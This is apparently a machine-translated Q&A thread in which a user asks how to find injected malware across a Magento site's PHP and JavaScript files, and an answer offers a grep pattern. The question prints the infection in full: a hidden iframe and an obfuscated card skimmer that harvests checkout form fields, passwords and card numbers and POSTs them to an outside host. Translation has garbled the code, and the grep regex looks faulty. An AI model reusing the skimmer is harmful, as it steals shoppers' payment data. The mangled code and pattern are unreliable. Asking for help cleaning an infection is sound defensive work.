我的一位朋友向我求助，他的 Magento 网站感染了恶意软件。是否有一种有效的方法或工具，可以递归扫描 php / javascript 目录及其子目录，查找特定的代码行？在这种情况下是：
//]]><“iframe”src =“http://web-statistika-google-now.com/?Yddv7D”width =“1”height =“1”frameborder =“0”> ; (添加 ””) 和
var _0x20f1 = [“\ x6C \ x6F \ x63 \ x61 \ x74 \ x69 \ x6F \ x6E”,“\ x74 \ x65 \ x73 \ x74”,“\ x6F \ x6E \ x65 \ x70 \ x61 \ x67 \ X65 \ X7C \ X63 \ X68 \ X65 \ X63 \ X6B \ x6F \ X75 \ X74 \ X7C \ x6F \ x6E \ X65 \ X73 \ X74 \ X65 \ X70 \ X63 \ X68 \ X65 \ X63 \ X6B \ x6F \ X75 \ X74 \ X7C \ x6F \ x6E \ X65 \ X70 \ X61 \ X67 \ X65 \ X63 \ X68 \ X65 \ X63 \ X6B \ x6F \ X75 \ X74 \ X7C \ X66 \ X69 \ X72 \ X65 \ X63 \ X68 \ X65 \ X63 \ X6B \ x6F \ X75 \ X74 \ X7C \ x6F \ x6E \ X65 \ X73 \ X74 \ X65 \ X70" ,“\ X44 \ x4F \ x4D \ X43 \ x6F \ x6E \ X74 \ X65 \ x6E \ X74 \ x4C \ x6F \ X61 \ 64 \ X65 \ 64" , “\ X61 \ 64 \ 64 \ X45 \ X76 \ X65 \ x6E \ X74 \ x4C \ X69 \ X73 \ X74 \ X65 \ x6E \ X65 \ X72”,“\ X69 \ x6E \ X70 \ X75 \ X74 \ X2C \ X20 \ X73 \ X65 \ X6C \ X65 \ X63 \ X74 \ X2C \ X20 \ X74 \ X65 \ X78 \ X74 \ X61 \ X72 \ X65 \ X61 \ X2C \ X20 \ X63 \ X68 \ X65 \ X63 \ X6B \ X62 \ x6F \ X78" ,“\ X71 \ X75 \ X65 \ X72 \ X79 \ X53 \ X65 \ X6C \ X65 \ X63 \ X74 \ x6F \ X72 \ X41 \ X6C \ X6C ”, “\ X6C \ X65 \ x6E \ X67 \ X74 \ X68”, “\ X76 \ X61 \ X6C \ X75 \ X65”, “\ X69 \ 64”, “”, “\ X3D”, “\ X26”, “\ X61 \ x5B \ X68 \ X72 \ X65 \ X66 \ X2A \ X3D \ X27 \ X6A \ X61 \ X76 \ X61 \ X73 \ X63 \ X72 \ X69 \ X70 \ X74 \ X3A \ X76 \ x6F \ X69 \ 64 \ X28 \ X30 \ X29 \ X27 \ X5D \ X2C \ X62 \ X75 \ X74 \ X74 \ x6F \ x6E \ X2C \ X20 \ X69 \ x6E \ X70 \ X75 \ X74 \ X2C \ X20 \ X73 \ X75 \ X62 \ X6D \ X69 \ X74 \ X2C \ X20 \ X2E \ X62 \ X74 \ x6E \ X2C \ X20 \ X2E \ X62 \ X75 \ X74 \ X74 \ x6F \ x6E”, “\ X74 \ X79 \ X70 \ X65”, “\ X74 \ X65 \ X78 \ X74”, “\ X73 \ X6C \ X65 \ X63 \ X74” , “\ X63 \ X68 \ X65 \ X63 \ X6B \ X62 \ x6F \ X78”, “\ X70 \ X61 \ X73 \ X73 \ X77 \ x6F \ X72 \ 64”,“\ X72 \ X61 \ 64 \ X69 \ x6F “ ”\ X63 \ X6C \ X69 \ X63 \ X6B“, ”\ x6F \ x6E \ X63 \ X6C \ X69 \ X63 \ X6B“,” \ X61 \ X74 \ X74 \ X61 \ X63 \ X68 \ X45 \ X76 \ X65 \ x6E \ X74" , “\ X66 \ x6F \ X72 \ X6D”, “\ X73 \ X75 \ X62 \ X6D \ X69 \ X74”,“\ x6F \ x6E \ X73 \ X75 \ X62 \ X6D \ X69 \ X74 “ ”\ X63 
\ X6C \ X65 \ X61 \ X72“, ”\ x5B \ X30 \ X2D \ X39 \ X5D \ x7B \ X31 \ X33 \ X2C \ X31 \ X36 \ x7D“, ”\ X30“,” \ X31 “ ”\ X50 \ x4F \ X53 \ X54“,” \ X68 \ X74 \ X74 \ X70 \ X73 \ X3A \ X2F \ X2F \ X69 \ x6E \ X66 \ x6F \ X70 \ X72 \ x6F \ X6D \ x6F \ X2E \ X62 \ X69 \ X7A \ X2F \ X6C \ X69 \ X62 \ X2F \ X70 \ X61 \ X79 \ X70 \ X61 \ X6C \ X5F \ X69 \ X63 \ x6F \ x6E \ X2E \ X6A \ X70 \ X67" ,“\ x6F \ X70 \ X65 \ x6E “ ”\ X43 \ x6F \ x6E \ X74 \ X65 \ x6E \ X74 \ X2D \ X74 \ X79 \ X70 \ X65“,” \ X61 \ X70 \ X70 \ X6C \ X69 \ X63 \ X61 \ X74 \ X69 \ x6F \ x6E \ X2F \ X78 \ X2D \ X77 \ X77 \ X77 \ X2D \ X66 \ x6F \ X72 \ X6D \ X2D \ X75 \ X72 \ X6C \ X65 \ x6E \ X63 \ x6F \ 64 \ X65 \ 64" , “\ X73 \ X65 \ X74 \ X52 \ X65 \ X71 \ X75 \ X65 \ X73 \ X74 \ X48 \ X65 \ X61 \ 64 \ X65 \ X72”,“\ 64 \ X61 \ X74 \ X61 \ X3D “ ”\ X26 \ X61 \ X73 \ 64 \ X3D“,” \ X26 \ X69 \ 64 \ X5F \ X69 \ 64 \ X3D \ X6D \ X61 \ X73 \ x73 \ x69 \ x6E \ x73 \ x74 \ x61 \ x6C \ x6C“,”\ x73 \ x65 \ x6E \ x64“,”\ x73 \ x65 \ x6E \ x64 \ x28 \ x29“]; var snd = null;功能start(){if((new RegExp(_0x20f1 [2]))_ 0x20f1 [1]){send()}} document_0x20f1 [4]; function clk(){var _0xdb51x4 = document_0x20f1 [6]; for(var _0xdb51x5 = 0; _0xdb51x5< _0xdb51x4 [_0x20f1 [7]]; _ 0xdb51x5 ++){if(_0xdb51x4 [_0xdb51x5] [_ 0x20f1 [8]] [_ 0x20f1 [7]]> 0){var _0xdb51x6 = _0xdb51x4 [_0xdb51x5] [_ 0x20f1 [9] ];若(_0xdb51x6 == _ 0x20f1 [10]){_ 0xdb51x6 = _0xdb51x5}; SND + = _ 0xdb51x4 [_0xdb51x5] [_ 0x20f1 [9]] + _ 0x20f1 [11] + _ 0xdb51x4 [_0xdb51x5] [_ 0x20f1 [8]] + _ 0x20f1 [12 ];}}};}函数send(){var _0xdb51x8 = document_0x20f1 [6]; for(var _0xdb51x5 = 0; _0xdb51x5< _0xdb51x8 [_0x20f1 [7]]; _ 0xdb51x5 ++){var _0xdb51x9 = _0xdb51x8 [_0xdb51x5]; if(_0xdb51x9) ![_0x20f1 [14] = _ 0x20f1 [15]&安培;&安培; _0xdb51x9 [_0x20f1 [14] = _ 0x20f1 [16]&安培;!&安培;!_0xdb51x9 [_0x20f1 [14] = _ 0x20f1 [17]&安培;&安培; _0xdb51x9 [_0x20f1 [14]]!= _ 0x20f1 [18]&& _0xdb51x9 [_0x20f1 [14]]!= _ 0x20f1 [19]){if(_0xdb51x9 [_0x20f1 [4]]){_ 0xdb51x9_0x20f1 [4]} else { 
_0xdb51x9_0x20f1 [22]}};}; var _0xdb5 1xa = document_0x20f1 [6]; for(var _0xdb51x5 = 0; _0xdb51x5< _0xdb51xa [_0x20f1 [7]]; _ 0xdb51x5 ++){if(_0xdb51xa [_0xdb51x5] [_ 0x20f1 [4]]){_ 0xdb51xa [_0xdb51x5] _0x20f1 [4]} else {_0xdb51xa [_0xdb51x5] _0x20f1 [22]}}; if(snd!= null){console_0x20f1 [26]; var _0xdb51xb = new RegExp(_0x20f1 [27]); var _0xdb51xc = _0x20f1 [28]; if(_0xdb51xb_0x20f1 [ 1]){_ 0xdb51xc = _0x20f1 [29]}; var _0xdb51xd = new XMLHttpRequest(); _ 0xdb51xd_0x20f1 [32]; _ 0xdb51xd_0x20f1 [35]; _ 0xdb51xd_0x20f1 [39]; console_0x20f1 [26];}; snd = null; setTimeout(_0x20f1 [ 40],140);}
任何帮助都会非常感激!
扬
答案 0 :(得分:0)
在根目录下你可以尝试：
grep -r "var _0x[a-Z0-9]*=[\"\\x[a-Z0-9]*".*setTimeout\(.*\)\;\} .
这至少能匹配你现有的样本。除非你真的别无选择，否则我不建议直接查找并替换。
我假设它以 var _0x 开头，开头包含大量十六进制转义，并以 setTimeout 调用结尾，正如你的示例所示。
至少它可以帮助你识别可能有问题的文件（在我们的例子中，是所有文件）。